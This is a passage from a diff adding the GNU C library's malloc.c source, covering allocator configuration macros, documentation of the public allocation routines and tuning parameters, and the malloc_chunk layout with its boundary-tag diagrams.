+  bounds. However, there are several add-ons and adaptations of this
+  or other mallocs available that do this.
+*/
+
+#ifndef MALLOC_DEBUG
+#define MALLOC_DEBUG 0
+#endif
+
+#ifndef NDEBUG
+# define __assert_fail(assertion, file, line, function)			\
+	 __malloc_assert(assertion, file, line, function)
+
+extern const char *__progname;
+
+static void
+__malloc_assert (const char *assertion, const char *file, unsigned int line,
+		 const char *function)
+{
+  (void) __fxprintf (NULL, "%s%s%s:%u: %s%sAssertion `%s' failed.\n",
+		     __progname, __progname[0] ? ": " : "",
+		     file, line,
+		     function ? function : "", function ? ": " : "",
+		     assertion);
+  fflush (stderr);
+  abort ();
+}
+#endif
+
+#if USE_TCACHE
+/* We want 64 entries.  This is an arbitrary limit, which tunables can reduce.  */
+# define TCACHE_MAX_BINS		64
+# define MAX_TCACHE_SIZE	tidx2usize (TCACHE_MAX_BINS-1)
+
+/* Only used to pre-fill the tunables.  */
+# define tidx2usize(idx)	(((size_t) idx) * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ)
+
+/* When "x" is from chunksize().  */
+# define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)
+/* When "x" is a user-provided size.  */
+# define usize2tidx(x) csize2tidx (request2size (x))
+
+/* With rounding and alignment, the bins are...
+   idx 0   bytes 0..24 (64-bit) or 0..12 (32-bit)
+   idx 1   bytes 25..40 or 13..20
+   idx 2   bytes 41..56 or 21..28
+   etc.  */
+
+/* This is another arbitrary limit, which tunables can change.  Each
+   tcache bin will hold at most this number of chunks.  */
+# define TCACHE_FILL_COUNT 7
+
+/* Maximum chunks in tcache bins for tunables.  This value must fit the range
+   of tcache->counts[] entries, else they may overflow.  */
+# define MAX_TCACHE_COUNT UINT16_MAX
+#endif
+
+
+/*
+  REALLOC_ZERO_BYTES_FREES should be set if a call to
+  realloc with zero bytes should be the same as a call to free.
+  This is required by the C standard. Otherwise, since this malloc
+  returns a unique pointer for malloc(0), so does realloc(p, 0).
+*/
+
+#ifndef REALLOC_ZERO_BYTES_FREES
+#define REALLOC_ZERO_BYTES_FREES 1
+#endif
+
+/*
+  TRIM_FASTBINS controls whether free() of a very small chunk can
+  immediately lead to trimming. Setting to true (1) can reduce memory
+  footprint, but will almost always slow down programs that use a lot
+  of small chunks.
+
+  Define this only if you are willing to give up some speed to more
+  aggressively reduce system-level memory footprint when releasing
+  memory in programs that use many small chunks.  You can get
+  essentially the same effect by setting MXFAST to 0, but this can
+  lead to even greater slowdowns in programs using many small chunks.
+  TRIM_FASTBINS is an in-between compile-time option, that disables
+  only those chunks bordering topmost memory from being placed in
+  fastbins.
+*/
+
+#ifndef TRIM_FASTBINS
+#define TRIM_FASTBINS  0
+#endif
+
+
+/* Definition for getting more memory from the OS.  */
+#define MORECORE         (*__morecore)
+#define MORECORE_FAILURE 0
+void * __default_morecore (ptrdiff_t);
+void *(*__morecore)(ptrdiff_t) = __default_morecore;
+
+
+#include <string.h>
+
+/*
+  MORECORE-related declarations. By default, rely on sbrk
+*/
+
+
+/*
+  MORECORE is the name of the routine to call to obtain more memory
+  from the system.  See below for general guidance on writing
+  alternative MORECORE functions, as well as a version for WIN32 and a
+  sample version for pre-OSX macos.
+*/
+
+#ifndef MORECORE
+#define MORECORE sbrk
+#endif
+
+/*
+  MORECORE_FAILURE is the value returned upon failure of MORECORE
+  as well as mmap. Since it cannot be an otherwise valid memory address,
+  and must reflect values of standard sys calls, you probably ought not
+  try to redefine it.
+*/
+
+#ifndef MORECORE_FAILURE
+#define MORECORE_FAILURE (-1)
+#endif
+
+/*
+  If MORECORE_CONTIGUOUS is true, take advantage of fact that
+  consecutive calls to MORECORE with positive arguments always return
+  contiguous increasing addresses.  This is true of unix sbrk.  Even
+  if not defined, when regions happen to be contiguous, malloc will
+  permit allocations spanning regions obtained from different
+  calls. But defining this when applicable enables some stronger
+  consistency checks and space efficiencies.
+*/
+
+#ifndef MORECORE_CONTIGUOUS
+#define MORECORE_CONTIGUOUS 1
+#endif
+
+/*
+  Define MORECORE_CANNOT_TRIM if your version of MORECORE
+  cannot release space back to the system when given negative
+  arguments. This is generally necessary only if you are using
+  a hand-crafted MORECORE function that cannot handle negative arguments.
+*/
+
+/* #define MORECORE_CANNOT_TRIM */
+
+/*  MORECORE_CLEARS           (default 1)
+     The degree to which the routine mapped to MORECORE zeroes out
+     memory: never (0), only for newly allocated space (1) or always
+     (2).  The distinction between (1) and (2) is necessary because on
+     some systems, if the application first decrements and then
+     increments the break value, the contents of the reallocated space
+     are unspecified.
+ */
+
+#ifndef MORECORE_CLEARS
+# define MORECORE_CLEARS 1
+#endif
+
+
+/*
+   MMAP_AS_MORECORE_SIZE is the minimum mmap size argument to use if
+   sbrk fails, and mmap is used as a backup.  The value must be a
+   multiple of page size.  This backup strategy generally applies only
+   when systems have "holes" in address space, so sbrk cannot perform
+   contiguous expansion, but there is still space available on system.
+   On systems for which this is known to be useful (i.e. most linux
+   kernels), this occurs only when programs allocate huge amounts of
+   memory.  Between this, and the fact that mmap regions tend to be
+   limited, the size should be large, to avoid too many mmap calls and
+   thus avoid running out of kernel resources.  */
+
+#ifndef MMAP_AS_MORECORE_SIZE
+#define MMAP_AS_MORECORE_SIZE (1024 * 1024)
+#endif
+
+/*
+  Define HAVE_MREMAP to make realloc() use mremap() to re-allocate
+  large blocks.
+*/
+
+#ifndef HAVE_MREMAP
+#define HAVE_MREMAP 0
+#endif
+
+/* We may need to support __malloc_initialize_hook for backwards
+   compatibility.  */
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_24)
+# define HAVE_MALLOC_INIT_HOOK 1
+#else
+# define HAVE_MALLOC_INIT_HOOK 0
+#endif
+
+
+/*
+  This version of malloc supports the standard SVID/XPG mallinfo
+  routine that returns a struct containing usage properties and
+  statistics. It should work on any SVID/XPG compliant system that has
+  a /usr/include/malloc.h defining struct mallinfo. (If you'd like to
+  install such a thing yourself, cut out the preliminary declarations
+  as described above and below and save them in a malloc.h file. But
+  there's no compelling reason to bother to do this.)
+
+  The main declaration needed is the mallinfo struct that is returned
+  (by-copy) by mallinfo().  The SVID/XPG malloinfo struct contains a
+  bunch of fields that are not even meaningful in this version of
+  malloc.  These fields are are instead filled by mallinfo() with
+  other numbers that might be of interest.
+*/
+
+
+/* ---------- description of public routines ------------ */
+
+/*
+  malloc(size_t n)
+  Returns a pointer to a newly allocated chunk of at least n bytes, or null
+  if no space is available. Additionally, on failure, errno is
+  set to ENOMEM on ANSI C systems.
+
+  If n is zero, malloc returns a minumum-sized chunk. (The minimum
+  size is 16 bytes on most 32bit systems, and 24 or 32 bytes on 64bit
+  systems.)  On most systems, size_t is an unsigned type, so calls
+  with negative arguments are interpreted as requests for huge amounts
+  of space, which will often fail. The maximum supported value of n
+  differs across systems, but is in all cases less than the maximum
+  representable value of a size_t.
+*/
+void*  __libc_malloc(size_t);
+libc_hidden_proto (__libc_malloc)
+
+/*
+  free(void* p)
+  Releases the chunk of memory pointed to by p, that had been previously
+  allocated using malloc or a related routine such as realloc.
+  It has no effect if p is null. It can have arbitrary (i.e., bad!)
+  effects if p has already been freed.
+
+  Unless disabled (using mallopt), freeing very large spaces will
+  when possible, automatically trigger operations that give
+  back unused memory to the system, thus reducing program footprint.
+*/
+void     __libc_free(void*);
+libc_hidden_proto (__libc_free)
+
+/*
+  calloc(size_t n_elements, size_t element_size);
+  Returns a pointer to n_elements * element_size bytes, with all locations
+  set to zero.
+*/
+void*  __libc_calloc(size_t, size_t);
+
+/*
+  realloc(void* p, size_t n)
+  Returns a pointer to a chunk of size n that contains the same data
+  as does chunk p up to the minimum of (n, p's size) bytes, or null
+  if no space is available.
+
+  The returned pointer may or may not be the same as p. The algorithm
+  prefers extending p when possible, otherwise it employs the
+  equivalent of a malloc-copy-free sequence.
+
+  If p is null, realloc is equivalent to malloc.
+
+  If space is not available, realloc returns null, errno is set (if on
+  ANSI) and p is NOT freed.
+
+  if n is for fewer bytes than already held by p, the newly unused
+  space is lopped off and freed if possible.  Unless the #define
+  REALLOC_ZERO_BYTES_FREES is set, realloc with a size argument of
+  zero (re)allocates a minimum-sized chunk.
+
+  Large chunks that were internally obtained via mmap will always be
+  grown using malloc-copy-free sequences unless the system supports
+  MREMAP (currently only linux).
+
+  The old unix realloc convention of allowing the last-free'd chunk
+  to be used as an argument to realloc is not supported.
+*/
+void*  __libc_realloc(void*, size_t);
+libc_hidden_proto (__libc_realloc)
+
+/*
+  memalign(size_t alignment, size_t n);
+  Returns a pointer to a newly allocated chunk of n bytes, aligned
+  in accord with the alignment argument.
+
+  The alignment argument should be a power of two. If the argument is
+  not a power of two, the nearest greater power is used.
+  8-byte alignment is guaranteed by normal malloc calls, so don't
+  bother calling memalign with an argument of 8 or less.
+
+  Overreliance on memalign is a sure way to fragment space.
+*/
+void*  __libc_memalign(size_t, size_t);
+libc_hidden_proto (__libc_memalign)
+
+/*
+  valloc(size_t n);
+  Equivalent to memalign(pagesize, n), where pagesize is the page
+  size of the system. If the pagesize is unknown, 4096 is used.
+*/
+void*  __libc_valloc(size_t);
+
+
+
+/*
+  mallopt(int parameter_number, int parameter_value)
+  Sets tunable parameters The format is to provide a
+  (parameter-number, parameter-value) pair.  mallopt then sets the
+  corresponding parameter to the argument value if it can (i.e., so
+  long as the value is meaningful), and returns 1 if successful else
+  0.  SVID/XPG/ANSI defines four standard param numbers for mallopt,
+  normally defined in malloc.h.  Only one of these (M_MXFAST) is used
+  in this malloc. The others (M_NLBLKS, M_GRAIN, M_KEEP) don't apply,
+  so setting them has no effect. But this malloc also supports four
+  other options in mallopt. See below for details.  Briefly, supported
+  parameters are as follows (listed defaults are for "typical"
+  configurations).
+
+  Symbol            param #   default    allowed param values
+  M_MXFAST          1         64         0-80  (0 disables fastbins)
+  M_TRIM_THRESHOLD -1         128*1024   any   (-1U disables trimming)
+  M_TOP_PAD        -2         0          any
+  M_MMAP_THRESHOLD -3         128*1024   any   (or 0 if no MMAP support)
+  M_MMAP_MAX       -4         65536      any   (0 disables use of mmap)
+*/
+int      __libc_mallopt(int, int);
+libc_hidden_proto (__libc_mallopt)
+
+
+/*
+  mallinfo()
+  Returns (by copy) a struct containing various summary statistics:
+
+  arena:     current total non-mmapped bytes allocated from system
+  ordblks:   the number of free chunks
+  smblks:    the number of fastbin blocks (i.e., small chunks that
+	       have been freed but not use resused or consolidated)
+  hblks:     current number of mmapped regions
+  hblkhd:    total bytes held in mmapped regions
+  usmblks:   always 0
+  fsmblks:   total bytes held in fastbin blocks
+  uordblks:  current total allocated space (normal or mmapped)
+  fordblks:  total free space
+  keepcost:  the maximum number of bytes that could ideally be released
+	       back to system via malloc_trim. ("ideally" means that
+	       it ignores page restrictions etc.)
+
+  Because these fields are ints, but internal bookkeeping may
+  be kept as longs, the reported values may wrap around zero and
+  thus be inaccurate.
+*/
+struct mallinfo __libc_mallinfo(void);
+
+
+/*
+  pvalloc(size_t n);
+  Equivalent to valloc(minimum-page-that-holds(n)), that is,
+  round up n to nearest pagesize.
+ */
+void*  __libc_pvalloc(size_t);
+
+/*
+  malloc_trim(size_t pad);
+
+  If possible, gives memory back to the system (via negative
+  arguments to sbrk) if there is unused memory at the `high' end of
+  the malloc pool. You can call this after freeing large blocks of
+  memory to potentially reduce the system-level memory requirements
+  of a program. However, it cannot guarantee to reduce memory. Under
+  some allocation patterns, some large free blocks of memory will be
+  locked between two used chunks, so they cannot be given back to
+  the system.
+
+  The `pad' argument to malloc_trim represents the amount of free
+  trailing space to leave untrimmed. If this argument is zero,
+  only the minimum amount of memory to maintain internal data
+  structures will be left (one page or less). Non-zero arguments
+  can be supplied to maintain enough trailing space to service
+  future expected allocations without having to re-obtain memory
+  from the system.
+
+  Malloc_trim returns 1 if it actually released any memory, else 0.
+  On systems that do not support "negative sbrks", it will always
+  return 0.
+*/
+int      __malloc_trim(size_t);
+
+/*
+  malloc_usable_size(void* p);
+
+  Returns the number of bytes you can actually use in
+  an allocated chunk, which may be more than you requested (although
+  often not) due to alignment and minimum size constraints.
+  You can use this many bytes without worrying about
+  overwriting other allocated objects. This is not a particularly great
+  programming practice. malloc_usable_size can be more useful in
+  debugging and assertions, for example:
+
+  p = malloc(n);
+  assert(malloc_usable_size(p) >= 256);
+
+*/
+size_t   __malloc_usable_size(void*);
+
+/*
+  malloc_stats();
+  Prints on stderr the amount of space obtained from the system (both
+  via sbrk and mmap), the maximum amount (which may be more than
+  current if malloc_trim and/or munmap got called), and the current
+  number of bytes allocated via malloc (or realloc, etc) but not yet
+  freed. Note that this is the number of bytes allocated, not the
+  number requested. It will be larger than the number requested
+  because of alignment and bookkeeping overhead. Because it includes
+  alignment wastage as being in use, this figure may be greater than
+  zero even when no user-level chunks are allocated.
+
+  The reported current and maximum system memory can be inaccurate if
+  a program makes other calls to system memory allocation functions
+  (normally sbrk) outside of malloc.
+
+  malloc_stats prints only the most commonly interesting statistics.
+  More information can be obtained by calling mallinfo.
+
+*/
+void     __malloc_stats(void);
+
+/*
+  posix_memalign(void **memptr, size_t alignment, size_t size);
+
+  POSIX wrapper like memalign(), checking for validity of size.
+*/
+int      __posix_memalign(void **, size_t, size_t);
+
+/* mallopt tuning options */
+
+/*
+  M_MXFAST is the maximum request size used for "fastbins", special bins
+  that hold returned chunks without consolidating their spaces. This
+  enables future requests for chunks of the same size to be handled
+  very quickly, but can increase fragmentation, and thus increase the
+  overall memory footprint of a program.
+
+  This malloc manages fastbins very conservatively yet still
+  efficiently, so fragmentation is rarely a problem for values less
+  than or equal to the default.  The maximum supported value of MXFAST
+  is 80. You wouldn't want it any higher than this anyway.  Fastbins
+  are designed especially for use with many small structs, objects or
+  strings -- the default handles structs/objects/arrays with sizes up
+  to 8 4byte fields, or small strings representing words, tokens,
+  etc. Using fastbins for larger objects normally worsens
+  fragmentation without improving speed.
+
+  M_MXFAST is set in REQUEST size units. It is internally used in
+  chunksize units, which adds padding and alignment.  You can reduce
+  M_MXFAST to 0 to disable all use of fastbins.  This causes the malloc
+  algorithm to be a closer approximation of fifo-best-fit in all cases,
+  not just for larger requests, but will generally cause it to be
+  slower.
+*/
+
+
+/* M_MXFAST is a standard SVID/XPG tuning option, usually listed in malloc.h */
+#ifndef M_MXFAST
+#define M_MXFAST            1
+#endif
+
+#ifndef DEFAULT_MXFAST
+#define DEFAULT_MXFAST     (64 * SIZE_SZ / 4)
+#endif
+
+
+/*
+  M_TRIM_THRESHOLD is the maximum amount of unused top-most memory
+  to keep before releasing via malloc_trim in free().
+
+  Automatic trimming is mainly useful in long-lived programs.
+  Because trimming via sbrk can be slow on some systems, and can
+  sometimes be wasteful (in cases where programs immediately
+  afterward allocate more large chunks) the value should be high
+  enough so that your overall system performance would improve by
+  releasing this much memory.
+
+  The trim threshold and the mmap control parameters (see below)
+  can be traded off with one another. Trimming and mmapping are
+  two different ways of releasing unused memory back to the
+  system. Between these two, it is often possible to keep
+  system-level demands of a long-lived program down to a bare
+  minimum. For example, in one test suite of sessions measuring
+  the XF86 X server on Linux, using a trim threshold of 128K and a
+  mmap threshold of 192K led to near-minimal long term resource
+  consumption.
+
+  If you are using this malloc in a long-lived program, it should
+  pay to experiment with these values.  As a rough guide, you
+  might set to a value close to the average size of a process
+  (program) running on your system.  Releasing this much memory
+  would allow such a process to run in memory.  Generally, it's
+  worth it to tune for trimming rather tham memory mapping when a
+  program undergoes phases where several large chunks are
+  allocated and released in ways that can reuse each other's
+  storage, perhaps mixed with phases where there are no such
+  chunks at all.  And in well-behaved long-lived programs,
+  controlling release of large blocks via trimming versus mapping
+  is usually faster.
+
+  However, in most programs, these parameters serve mainly as
+  protection against the system-level effects of carrying around
+  massive amounts of unneeded memory. Since frequent calls to
+  sbrk, mmap, and munmap otherwise degrade performance, the default
+  parameters are set to relatively high values that serve only as
+  safeguards.
+
+  The trim value It must be greater than page size to have any useful
+  effect.  To disable trimming completely, you can set to
+  (unsigned long)(-1)
+
+  Trim settings interact with fastbin (MXFAST) settings: Unless
+  TRIM_FASTBINS is defined, automatic trimming never takes place upon
+  freeing a chunk with size less than or equal to MXFAST. Trimming is
+  instead delayed until subsequent freeing of larger chunks. However,
+  you can still force an attempted trim by calling malloc_trim.
+
+  Also, trimming is not generally possible in cases where
+  the main arena is obtained via mmap.
+
+  Note that the trick some people use of mallocing a huge space and
+  then freeing it at program startup, in an attempt to reserve system
+  memory, doesn't have the intended effect under automatic trimming,
+  since that memory will immediately be returned to the system.
+*/
+
+#define M_TRIM_THRESHOLD       -1
+
+#ifndef DEFAULT_TRIM_THRESHOLD
+#define DEFAULT_TRIM_THRESHOLD (128 * 1024)
+#endif
+
+/*
+  M_TOP_PAD is the amount of extra `padding' space to allocate or
+  retain whenever sbrk is called. It is used in two ways internally:
+
+  * When sbrk is called to extend the top of the arena to satisfy
+  a new malloc request, this much padding is added to the sbrk
+  request.
+
+  * When malloc_trim is called automatically from free(),
+  it is used as the `pad' argument.
+
+  In both cases, the actual amount of padding is rounded
+  so that the end of the arena is always a system page boundary.
+
+  The main reason for using padding is to avoid calling sbrk so
+  often. Having even a small pad greatly reduces the likelihood
+  that nearly every malloc request during program start-up (or
+  after trimming) will invoke sbrk, which needlessly wastes
+  time.
+
+  Automatic rounding-up to page-size units is normally sufficient
+  to avoid measurable overhead, so the default is 0.  However, in
+  systems where sbrk is relatively slow, it can pay to increase
+  this value, at the expense of carrying around more memory than
+  the program needs.
+*/
+
+#define M_TOP_PAD              -2
+
+#ifndef DEFAULT_TOP_PAD
+#define DEFAULT_TOP_PAD        (0)
+#endif
+
+/*
+  MMAP_THRESHOLD_MAX and _MIN are the bounds on the dynamically
+  adjusted MMAP_THRESHOLD.
+*/
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MIN
+#define DEFAULT_MMAP_THRESHOLD_MIN (128 * 1024)
+#endif
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MAX
+  /* For 32-bit platforms we cannot increase the maximum mmap
+     threshold much because it is also the minimum value for the
+     maximum heap size and its alignment.  Going above 512k (i.e., 1M
+     for new heaps) wastes too much address space.  */
+# if __WORDSIZE == 32
+#  define DEFAULT_MMAP_THRESHOLD_MAX (512 * 1024)
+# else
+#  define DEFAULT_MMAP_THRESHOLD_MAX (4 * 1024 * 1024 * sizeof(long))
+# endif
+#endif
+
+/*
+  M_MMAP_THRESHOLD is the request size threshold for using mmap()
+  to service a request. Requests of at least this size that cannot
+  be allocated using already-existing space will be serviced via mmap.
+  (If enough normal freed space already exists it is used instead.)
+
+  Using mmap segregates relatively large chunks of memory so that
+  they can be individually obtained and released from the host
+  system. A request serviced through mmap is never reused by any
+  other request (at least not directly; the system may just so
+  happen to remap successive requests to the same locations).
+
+  Segregating space in this way has the benefits that:
+
+   1. Mmapped space can ALWAYS be individually released back
+      to the system, which helps keep the system level memory
+      demands of a long-lived program low.
+   2. Mapped memory can never become `locked' between
+      other chunks, as can happen with normally allocated chunks, which
+      means that even trimming via malloc_trim would not release them.
+   3. On some systems with "holes" in address spaces, mmap can obtain
+      memory that sbrk cannot.
+
+  However, it has the disadvantages that:
+
+   1. The space cannot be reclaimed, consolidated, and then
+      used to service later requests, as happens with normal chunks.
+   2. It can lead to more wastage because of mmap page alignment
+      requirements
+   3. It causes malloc performance to be more dependent on host
+      system memory management support routines which may vary in
+      implementation quality and may impose arbitrary
+      limitations. Generally, servicing a request via normal
+      malloc steps is faster than going through a system's mmap.
+
+  The advantages of mmap nearly always outweigh disadvantages for
+  "large" chunks, but the value of "large" varies across systems.  The
+  default is an empirically derived value that works well in most
+  systems.
+
+
+  Update in 2006:
+  The above was written in 2001. Since then the world has changed a lot.
+  Memory got bigger. Applications got bigger. The virtual address space
+  layout in 32 bit linux changed.
+
+  In the new situation, brk() and mmap space is shared and there are no
+  artificial limits on brk size imposed by the kernel. What is more,
+  applications have started using transient allocations larger than the
+  128Kb as was imagined in 2001.
+
+  The price for mmap is also high now; each time glibc mmaps from the
+  kernel, the kernel is forced to zero out the memory it gives to the
+  application. Zeroing memory is expensive and eats a lot of cache and
+  memory bandwidth. This has nothing to do with the efficiency of the
+  virtual memory system, by doing mmap the kernel just has no choice but
+  to zero.
+
+  In 2001, the kernel had a maximum size for brk() which was about 800
+  megabytes on 32 bit x86, at that point brk() would hit the first
+  mmaped shared libaries and couldn't expand anymore. With current 2.6
+  kernels, the VA space layout is different and brk() and mmap
+  both can span the entire heap at will.
+
+  Rather than using a static threshold for the brk/mmap tradeoff,
+  we are now using a simple dynamic one. The goal is still to avoid
+  fragmentation. The old goals we kept are
+  1) try to get the long lived large allocations to use mmap()
+  2) really large allocations should always use mmap()
+  and we're adding now:
+  3) transient allocations should use brk() to avoid forcing the kernel
+     having to zero memory over and over again
+
+  The implementation works with a sliding threshold, which is by default
+  limited to go between 128Kb and 32Mb (64Mb for 64 bitmachines) and starts
+  out at 128Kb as per the 2001 default.
+
+  This allows us to satisfy requirement 1) under the assumption that long
+  lived allocations are made early in the process' lifespan, before it has
+  started doing dynamic allocations of the same size (which will
+  increase the threshold).
+
+  The upperbound on the threshold satisfies requirement 2)
+
+  The threshold goes up in value when the application frees memory that was
+  allocated with the mmap allocator. The idea is that once the application
+  starts freeing memory of a certain size, it's highly probable that this is
+  a size the application uses for transient allocations. This estimator
+  is there to satisfy the new third requirement.
+
+*/
+
+#define M_MMAP_THRESHOLD      -3
+
+#ifndef DEFAULT_MMAP_THRESHOLD
+#define DEFAULT_MMAP_THRESHOLD DEFAULT_MMAP_THRESHOLD_MIN
+#endif
+
+/*
+  M_MMAP_MAX is the maximum number of requests to simultaneously
+  service using mmap. This parameter exists because
+  some systems have a limited number of internal tables for
+  use by mmap, and using more than a few of them may degrade
+  performance.
+
+  The default is set to a value that serves only as a safeguard.
+  Setting to 0 disables use of mmap for servicing large requests.
+*/
+
+#define M_MMAP_MAX             -4
+
+#ifndef DEFAULT_MMAP_MAX
+#define DEFAULT_MMAP_MAX       (65536)
+#endif
+
+#include <malloc.h>
+
+#ifndef RETURN_ADDRESS
+#define RETURN_ADDRESS(X_) (NULL)
+#endif
+
+/* Forward declarations.  */
+struct malloc_chunk;
+typedef struct malloc_chunk* mchunkptr;
+
+/* Internal routines.  */
+
+static void*  _int_malloc(mstate, size_t);
+static void     _int_free(mstate, mchunkptr, int);
+static void*  _int_realloc(mstate, mchunkptr, INTERNAL_SIZE_T,
+			   INTERNAL_SIZE_T);
+static void*  _int_memalign(mstate, size_t, size_t);
+static void*  _mid_memalign(size_t, size_t, void *);
+
+static void malloc_printerr(const char *str) __attribute__ ((noreturn));
+
+static void* mem2mem_check(void *p, size_t sz);
+static void top_check(void);
+static void munmap_chunk(mchunkptr p);
+#if HAVE_MREMAP
+static mchunkptr mremap_chunk(mchunkptr p, size_t new_size);
+#endif
+
+static void*   malloc_check(size_t sz, const void *caller);
+static void      free_check(void* mem, const void *caller);
+static void*   realloc_check(void* oldmem, size_t bytes,
+			       const void *caller);
+static void*   memalign_check(size_t alignment, size_t bytes,
+				const void *caller);
+
+/* ------------------ MMAP support ------------------  */
+
+
+#include <fcntl.h>
+#include <sys/mman.h>
+
+#if !defined(MAP_ANONYMOUS) && defined(MAP_ANON)
+# define MAP_ANONYMOUS MAP_ANON
+#endif
+
+#ifndef MAP_NORESERVE
+# define MAP_NORESERVE 0
+#endif
+
+#define MMAP(addr, size, prot, flags) \
+ __mmap((addr), (size), (prot), (flags)|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)
+
+
+/*
+  -----------------------  Chunk representations -----------------------
+*/
+
+
+/*
+  This struct declaration is misleading (but accurate and necessary).
+  It declares a "view" into memory allowing access to necessary
+  fields at known offsets from a given base. See explanation below.
+*/
+
+struct malloc_chunk {
+
+  INTERNAL_SIZE_T      mchunk_prev_size;  /* Size of previous chunk (if free).  */
+  INTERNAL_SIZE_T      mchunk_size;       /* Size in bytes, including overhead. */
+
+  struct malloc_chunk* fd;         /* double links -- used only if free. */
+  struct malloc_chunk* bk;
+
+  /* Only used for large blocks: pointer to next larger size.  */
+  struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
+  struct malloc_chunk* bk_nextsize;
+};
+
+
+/*
+   malloc_chunk details:
+
+    (The following includes lightly edited explanations by Colin Plumb.)
+
+    Chunks of memory are maintained using a `boundary tag' method as
+    described in e.g., Knuth or Standish.  (See the paper by Paul
+    Wilson ftp://ftp.cs.utexas.edu/pub/garbage/allocsrv.ps for a
+    survey of such techniques.)  Sizes of free chunks are stored both
+    in the front of each chunk and at the end.  This makes
+    consolidating fragmented chunks into bigger chunks very fast.  The
+    size fields also hold bits representing whether chunks are free or
+    in use.
+
+    An allocated chunk looks like this:
+
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of chunk, in bytes                     |A|M|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             User data starts here...                          .
+	    .                                                               .
+	    .             (malloc_usable_size() bytes)                      .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             (size of chunk, but used for application data)    |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|1|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    Where "chunk" is the front of the chunk for the purpose of most of
+    the malloc code, but "mem" is the pointer that is returned to the
+    user.  "Nextchunk" is the beginning of the next contiguous chunk.
+
+    Chunks always begin on even word boundaries, so the mem portion
+    (which is returned to the user) is also on an even word boundary, and
+    thus at least double-word aligned.
+
+    Free chunks are stored in circular doubly-linked lists, and look like this:
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `head:' |             Size of chunk, in bytes                     |A|0|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Forward pointer to next chunk in list             |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Back pointer to previous chunk in list            |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Unused space (may be 0 bytes long)                .
+	    .                                                               .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `foot:' |             Size of chunk, in bytes                           |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|0|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    The P (PREV_INUSE) bit, stored in the unused low-order bit of the
+    chunk size (which is always a multiple of two words), is an in-use
+    bit for the *previous* chunk.  If that bit is *clear*, then the
+    word before the current chunk size contains the previous chunk
+    size, and can be used to find the front of the previous chunk.
+    The very first chunk allocated always has this bit set,
+    preventing access to non-existent (or non-owned) memory. If
+    prev_inuse is set for any given chunk, then you CANNOT determine
+    the size of the previous chunk, and might even get a memory
+    addressing fault when trying to do so.
+
+    The A (NON_MAIN_ARENA) bit is cleared for chunks on the initial,
+    main arena, described by the main_arena variable.  When additional
+    threads are spawned, each thread receives its own arena (up to a
+    configurable limit, after which arenas are reused for multiple
+    threads), and the chunks in these arenas have the A bit set.  To
+    find the arena for a chunk on such a non-main arena, heap_for_ptr
+    performs a bit mask operation and indirection through the ar_ptr
+    member of the per-heap header heap_info (see arena.c).
+
+    Note that the `foot' of the current chunk is actually represented
+    as the prev_size of the NEXT chunk. This makes it easier to
+    deal with alignments etc but can be very confusing when trying
+    to extend or adapt this code.
+
+    The three exceptions to all this are:
+
+     1. The special chunk `top' doesn't bother using the
+	trailing size field since there is no next contiguous chunk
+	that would have to index off it. After initialization, `top'
+	is forced to always exist.  If it would become less than
+	MINSIZE bytes long, it is replenished.
+
+     2. Chunks allocated via mmap, which have the second-lowest-order
+	bit M (IS_MMAPPED) set in their size fields.  Because they are
+	allocated one-by-one, each must contain its own trailing size
+	field.  If the M bit is set, the other bits are ignored
+	(because mmapped chunks are neither in an arena, nor adjacent
+	to a freed chunk).  The M bit is also used for chunks which
+	originally came from a dumped heap via malloc_set_state in
+	hooks.c.
+
+     3. Chunks in fastbins are treated as allocated chunks from the
+	point of view of the chunk allocator.  They are consolidated
+	with their neighbors only in bulk, in malloc_consolidate.
+*/
+
+/*
+  ---------- Size and alignment checks and conversions ----------
+*/
+
+/* conversion from malloc headers to user pointers, and back */
+
+#define chunk2mem(p)   ((void*)((char*)(p) + 2*SIZE_SZ))
+#define mem2chunk(mem) ((mchunkptr)((char*)(mem) - 2*SIZE_SZ))
+
